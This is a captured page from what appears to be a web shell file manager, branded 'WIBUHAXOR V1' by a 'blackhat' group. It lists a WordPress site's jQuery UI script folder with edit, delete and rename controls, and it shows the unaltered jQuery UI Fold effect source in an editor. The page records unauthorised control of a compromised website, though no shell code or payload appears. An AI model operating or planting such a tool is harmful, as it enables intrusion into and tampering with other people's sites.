-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
rohihbs.com
/
wp-includes
/
js
/
jquery
/
ui
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
accordion.js
15.76KB
Edit File
Delete File
Rename
autocomplete.js
17.119KB
Edit File
Delete File
Rename
button.js
11.432KB
Edit File
Delete File
Rename
checkboxradio.js
7.411KB
Edit File
Delete File
Rename
core.js
48.719KB
Edit File
Delete File
Rename
datepicker.js
80.589KB
Edit File
Delete File
Rename
dialog.js
23.336KB
Edit File
Delete File
Rename
draggable.js
34.713KB
Edit File
Delete File
Rename
effect-blind.js
1.605KB
Edit File
Delete File
Rename
effect-clip.js
1.54KB
Edit File
Delete File
Rename
effect-drop.js
1.558KB
Edit File
Delete File
Rename
effect-explode.js
2.855KB
Edit File
Delete File
Rename
effect-explode.min.js
1.096KB
Edit File
Delete File
Rename
effect-fade.js
0.945KB
Edit File
Delete File
Rename
effect-fold.js
2.134KB
Edit File
Delete File
Rename
effect-highlight.js
1.214KB
Edit File
Delete File
Rename
effect-puff.js
0.972KB
Edit File
Delete File
Rename
effect-pulsate.js
1.53KB
Edit File
Delete File
Rename
effect-scale.js
1.341KB
Edit File
Delete File
Rename
effect-shake.js
1.84KB
Edit File
Delete File
Rename
effect-size.js
5.291KB
Edit File
Delete File
Rename
effect-slide.js
1.921KB
Edit File
Delete File
Rename
effect-transfer.js
0.867KB
Edit File
Delete File
Rename
effect.js
24.036KB
Edit File
Delete File
Rename
menu.js
18.516KB
Edit File
Delete File
Rename
mouse.js
6.081KB
Edit File
Delete File
Rename
progressbar.js
4.14KB
Edit File
Delete File
Rename
resizable.js
29.775KB
Edit File
Delete File
Rename
selectable.js
7.938KB
Edit File
Delete File
Rename
selectmenu.js
15.963KB
Edit File
Delete File
Rename
slider.js
19.14KB
Edit File
Delete File
Rename
sortable.js
46.524KB
Edit File
Delete File
Rename
tabs.js
23.109KB
Edit File
Delete File
Rename
tooltip.js
14.137KB
Edit File
Delete File
Rename
/*! * jQuery UI Effects Fold 1.13.3 * https://jqueryui.com * * Copyright OpenJS Foundation and other contributors * Released under the MIT license. * https://jquery.org/license */ //>>label: Fold Effect //>>group: Effects //>>description: Folds an element first horizontally and then vertically. //>>docs: https://api.jqueryui.com/fold-effect/ //>>demos: https://jqueryui.com/effect/ ( function( factory ) { "use strict"; if ( typeof define === "function" && define.amd ) { // AMD. Register as an anonymous module. define( [ "jquery", "../version", "../effect" ], factory ); } else { // Browser globals factory( jQuery ); } } )( function( $ ) { "use strict"; return $.effects.define( "fold", "hide", function( options, done ) { // Create element var element = $( this ), mode = options.mode, show = mode === "show", hide = mode === "hide", size = options.size || 15, percent = /([0-9]+)%/.exec( size ), horizFirst = !!options.horizFirst, ref = horizFirst ? [ "right", "bottom" ] : [ "bottom", "right" ], duration = options.duration / 2, placeholder = $.effects.createPlaceholder( element ), start = element.cssClip(), animation1 = { clip: $.extend( {}, start ) }, animation2 = { clip: $.extend( {}, start ) }, distance = [ start[ ref[ 0 ] ], start[ ref[ 1 ] ] ], queuelen = element.queue().length; if ( percent ) { size = parseInt( percent[ 1 ], 10 ) / 100 * distance[ hide ? 0 : 1 ]; } animation1.clip[ ref[ 0 ] ] = size; animation2.clip[ ref[ 0 ] ] = size; animation2.clip[ ref[ 1 ] ] = 0; if ( show ) { element.cssClip( animation2.clip ); if ( placeholder ) { placeholder.css( $.effects.clipToBox( animation2 ) ); } animation2.clip = start; } // Animate element .queue( function( next ) { if ( placeholder ) { placeholder .animate( $.effects.clipToBox( animation1 ), duration, options.easing ) .animate( $.effects.clipToBox( animation2 ), duration, options.easing ); } next(); } ) .animate( animation1, duration, options.easing ) .animate( animation2, duration, options.easing ) .queue( done ); $.effects.unshift( element, queuelen, 4 ); } ); } );
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat